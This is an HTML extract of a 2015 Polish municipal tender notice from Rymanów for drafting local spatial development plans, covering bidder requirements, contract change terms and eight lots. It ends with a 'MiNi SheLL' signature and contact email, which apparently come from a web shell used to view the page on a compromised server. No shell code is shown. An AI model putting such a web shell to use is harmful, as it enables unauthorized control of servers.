Ocena spełnienia przez Wykonawców powyższego warunku udziału w postępowaniu dokonana będzie na podstawie złożonego przez Wykonawcę Wykazu usług, zawierającego informacje niezbędne do oceny spełnienia przedmiotowego warunku oraz dowodów, czy zostały wykonane lub są wykonywane należycie. Ocena spełnienia tego warunku przez Wykonawcę powołującego się na zasoby innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp dokonana będzie w takim samym zakresie jaki jest wymagany dla Wykonawcy. Zamawiający wymaga podania danych dotyczących daty publikacji wykonanego miejscowego planu zagospodarowania przestrzennego oraz nr Dziennika Urzędowego.
Dowodami, o których mowa powyżej są:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert;
-  w przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej
W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa powyżej zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania
dowodów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie powyższego warunku Zamawiający nie precyzuje żadnych wymagań, których  spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia warunku zostanie dokonana na podstawie złożonego oświadczenia -  Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia,  Wykonawcy spełnią poniższe wymagania: 
a) część nr 1, 2, 3, 4, 5 zamówienia - Wymagane jest wykazanie przez Wykonawcę dysponowania minimum 2 osobami w zespole projektowym (w tym 1 osoba do pełnienia funkcji głównego projektanta planu), które spełniają wymogi  art. 5 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (tj. Dz.U. z 2015, poz. 199 ze zm.),
b) część nr 6 zamówienia - wymagane jest wykazanie przez Wykonawcę dysponowania minimum 2 osobami w zespole projektowym (w tym 1 osoba do pełnienia funkcji głównego projektanta planu), które spełniają wymogi  art. 5 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (tj. Dz.U. z 2015, poz. 199 ze zm.), 
g) cześć nr 7 zamówienia - wymagane jest wykazanie przez Wykonawcę dysponowania minimum 2 osobami w zespole projektowym (w tym 1 osoba do pełnienia funkcji głównego projektanta planu), które spełniają wymogi  art. 5 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (tj. Dz.U. z 2015, poz. 199 ze zm.),
h) cześć nr 8 zamówienia - wymagane jest wykazanie przez Wykonawcę dysponowania minimum 2 osobami w zespole projektowym (w tym 1 osoba do pełnienia funkcji głównego projektanta planu), które spełniają wymogi  art. 5 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (tj. Dz.U. z 2015, poz. 199 ze zm.),
Ocena spełnienia przez osobę, określonych wymogów dokonana będzie na podstawie złożonego przez Wykonawcę Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia zawierającego informacje niezbędne do oceny spełnienia warunku udziału w postępowaniu w zakresie dysponowania potencjałem kadrowym oraz oświadczenia Wykonawcy o posiadaniu przez w.w osoby wymaganych uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie powyższego warunku Zamawiający nie precyzuje żadnych wymagań, których  spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia warunku zostanie dokonana na podstawie złożonego oświadczenia -  Załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy,
2. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany, zgodnie z przepisami ustawy - Prawo zamówień publicznych.
2. Zamawiający przewiduje możliwość dokonania następujących istotnych zmian w zawartej umowie w sprawie niniejszego zamówienia publicznego, określając jednocześnie warunki ich wprowadzenia:
1) W przypadku zaistnienia niezależnej od Wykonawcy konieczności zastąpienia którejkolwiek z osób wskazanych w ofercie do wykonania przedmiotu umowy, Wykonawca jest zobowiązany pisemnie uzasadnić zmianę i przedstawić propozycję nowej osoby do akceptacji Zamawiającego. W przypadku, gdy kwalifikacje i doświadczenie wskazanej przez Wykonawcę nowej osoby będą niższe od kwalifikacji i doświadczenia personelu wymaganego w SIWZ lub wprowadzona zmiana może w ocenie Zamawiającego spowodować wydłużenie terminu wykonania umowy, Zamawiający w terminie 7 dni od dnia otrzymania propozycji zmiany jest uprawniony do odrzucenia propozycji zmiany którejkolwiek z osób wskazanych w ofercie.
2) Zamawiający przewiduje możliwość dokonania zmniejszenia zakresu przedmiotu umowy wraz z ograniczeniem należnego Wykonawcy wynagrodzenia w następujących przypadkach:
a) zaistnienia trudności finansowych u Zamawiającego,
b) gdy realizacja przedmiotu zamówienia w pełnym zakresie stanie się niezasadna z przyczyn ekonomicznych lub gospodarczych o obiektywnym charakterze, lub z innych przyczyn niezależnych od Zamawiającego,
3) Zamawiający dopuszcza zmianę terminu realizacji umowy, tj. jej wydłużenie lub skrócenie na warunkach wskazanych poniżej, przy czym skrócenie terminu realizacji umowy lub terminu płatności jest dopuszczalne pod warunkiem posiadania przez Zamawiającego środków finansowych na zapłatę wynagrodzenia Wykonawcy,
4) Zamawiający przewiduje możliwość zmiany terminów umowy lub poszczególnych etapów umowy, wyłącznie z przyczyn niezależnych od Wykonawcy, mających wpływ na wykonanie przedmiotu umowy lub poszczególnych etapów umowy w następujących przypadkach:
a) opóźnień w uzyskaniu niezbędnych opinii, uzgodnień i decyzji dotyczących przedmiotu umowy i nie wynikają one z winy Wykonawcy,
b) przekroczenia przewidzianych przepisami prawa terminów trwania procedur administracyjnych, liczonych zgodnie z zasadami określonymi w odpowiednich przepisach prawa i nie wynikają one z winy Wykonawcy,
c) zmiany w przepisach prawa mających wpływ na prace czy decyzje administracyjne będące przedmiotem umowy,
d) wcześniejszej realizacji przedmiotu zamówienia lub któregokolwiek etapu,
e) wcześniejszego uzyskania prawomocnego pozwolenia na budowę,
f) konieczności uwzględnienia w przedmiocie umowy wniesionych skarg i wniosków do przedsięwzięcia, dla którego wykonywane są opracowania,
g) wezwanie przez organy administracji publicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy lub jego poszczególnych etapów,
h) w przypadku zmniejszenia zakresu przedmiotu umowy wraz z ograniczeniem należnego Wykonawcy wynagrodzenia,
3. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonanej i odebranej części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rymanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rymanowie, 
ul. Mitkowskiego 14 a, 38-480 Rymanów - Biuro Obsługi - pok. nr 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2015 godzina 10:00, miejsce: Urząd Gminy w Rymanowie, 
ul. Mitkowskiego 14 a, 38-480 Rymanów - Biuro Obsługi - pok. nr 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego POSADA GÓRNA/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pracowanie Miejscowego Planu Zagospodarowania Przestrzennego POSADA GÓRNA/2014, zgodnie z Uchwałą Nr LVII/579/14 Rady Miejskiej w Rymanowie z dnia 29 sierpnia 2014r. ( pow. ok. 120 ha).
(treść uchwały zgodna z załącznikiem nr 11)
UWAGA - na części terenów objętych przedmiotem zamówienia występują: obszar  uzdrowiska, gdzie obowiązują strefy ochrony uzdrowiskowej B, C, Obszar Chronionego Krajobrazu Beskidu Niskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Długość okresu gwarancji i rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego KLIMKÓWKA/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego KLIMKÓWKA/2014, zgodnie z Uchwałą Nr LVII/580/14 Rady Miejskiej w Rymanowie z dnia 29 sierpnia 2014r. ( pow. ok. 217 ha).
(treść uchwały zgodna z załącznikiem nr 11)
UWAGA - na części terenów objętych przedmiotem zamówienia występują: obszar  strefy ochrony uzdrowiskowej C, Obszar Chronionego Krajobrazu Beskidu Niskiego, Obszar NATURA 2000, obszary i tereny górnicze, projektowane rezerwaty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Długość okresu gwarancji i rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego SIENIAWA/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego SIENIAWA/2014, zgodnie z Uchwałą Nr LVII/581/14 Rady Miejskiej w Rymanowie z dnia 29 sierpnia 2014r. (pow. ok. 222 ha)
(treść uchwały zgodna z załącznikiem nr 11)
UWAGA - na części terenów objętych przedmiotem zamówienia występują: Obszar Chronionego Krajobrazu Beskidu Niskiego, Obszar NATURA 2000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Długość okresu gwarancji i rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego LADZIN/2014.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego LADZIN/2014, zgodnie z Uchwałą Nr LVII/582/14 Rady Miejskiej w Rymanowie z dnia 29 sierpnia 2014r.(pow. ok. 78 ha).
(treść uchwały zgodna z załącznikiem nr 11).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Długość okresu gwarancji i rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego ŁAZY-FARMA FOTOWOLTAICZA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie Miejscowego Planu Zagospodarowania Przestrzennego ŁAZY-FARMA FOTOWOLTAICZA, zgodnie z Uchwałą NR XXXIV/359/13 Rady Miejskiej w Rymanowie z dnia 24 stycznia 2013r. (pow. ok. 3 ha).
(treść uchwały zgodna z załącznikiem nr 11).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Długość okresu gwarancji i rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z załącznikiem graficznym Nr 1 (jeden obszar farmy fotowoltaicznej) do Uchwały Nr IV/31/15 Rady Miejskiej w Rymanowie z dnia 10 lutego 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
6.2) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z Załącznikiem Graficznym Nr 1 do Uchwały Nr V/52/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. 
(treść uchwały zgodna z załącznikiem nr 11)
6.3) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z Załącznikiem Graficznym Nr 2 do Uchwały Nr V/52/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. 
(treść uchwały zgodna z załącznikiem nr 11)
6.4) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z Załącznikiem Graficznym Nr 3 do Uchwały Nr V/52/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
6.5) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z załącznikiem graficznym Nr  1  (z wyłączeniem obszaru planowanej farmy fotowoltaicznej Łazy) do Uchwały Nr IV/31/15 Rady Miejskiej w Rymanowie z dnia 10 lutego 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
6.6) opracowanie Zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Rymanów, zgodnie z załącznikiem graficznym Nr 2 do Uchwały Nr IV/31/15 Rady Miejskiej w Rymanowie z dnia 10 lutego 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
UWAGA - na części terenów objętych przedmiotem zamówienia występują: obszar  uzdrowiska, gdzie obowiązują strefy ochrony uzdrowiskowej A,B,C, Obszar Chronionego Krajobrazu Beskidu Niskiego, Obszar NATURA 2000, obszary i tereny górnicze..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Długość okresu gwarancji i rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ, zgodnie z Uchwałą Nr V/55/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. (dwa obszary w okolicach terenu basenu w Rymanowie Zdroju).
(treść uchwały zgodna z załącznikiem nr 11)
7.2) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ, zgodnie z Uchwałą Nr LVIII/597/14 Rady Miejskiej w Rymanowie z dnia 24 października 2014r.
(treść uchwały zgodna z załącznikiem nr 11)
7.3) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ, zgodnie z Uchwałą Nr V/54/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r
UWAGA - Opracowanie zmian Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW ZDRÓJ na obszarze  uzdrowiska, gdzie obowiązują strefy ochrony uzdrowiskowej A,B,C, Obszar Chronionego Krajobrazu Beskidu Niskiego, Obszar NATURA 2000, obszary i tereny górnicze.
(treść uchwały zgodna z załącznikiem nr 11).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Długość okresu gwarancji i rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW, zgodnie z  załącznikiem graficznym Nr 1 do Uchwały Nr V/53/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. (obszar planowanej farmy fotowoltaicznej w okolicach Beskiej Góry w Rymanowie).
(treść uchwały zgodna z załącznikiem nr 11)
8.2) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW, zgodnie z załącznikiem graficznym Nr 2 do Uchwały Nr V/53/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r. ( obszar w istniejącej strefie sanitarnej cmentarza w Rymanowie).
(treść uchwały zgodna z załącznikiem nr 11)
8.3) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW, zgodnie z Uchwałą Nr IV/32/15 Rady Miejskiej w Rymanowie z dnia 10 lutego 2015r.
(treść uchwały zgodna z załącznikiem nr 11)
8.4) opracowanie Zmiany Miejscowego Planu Zagospodarowania Przestrzennego RYMANÓW, zgodnie z załącznikiem graficznym Nr 3 do Uchwały Nr V/53/15 Rady Miejskiej w Rymanowie z dnia 20 marca 2015r.,
(treść uchwały zgodna z załącznikiem nr 11).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Długość okresu gwarancji i rękojmi - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com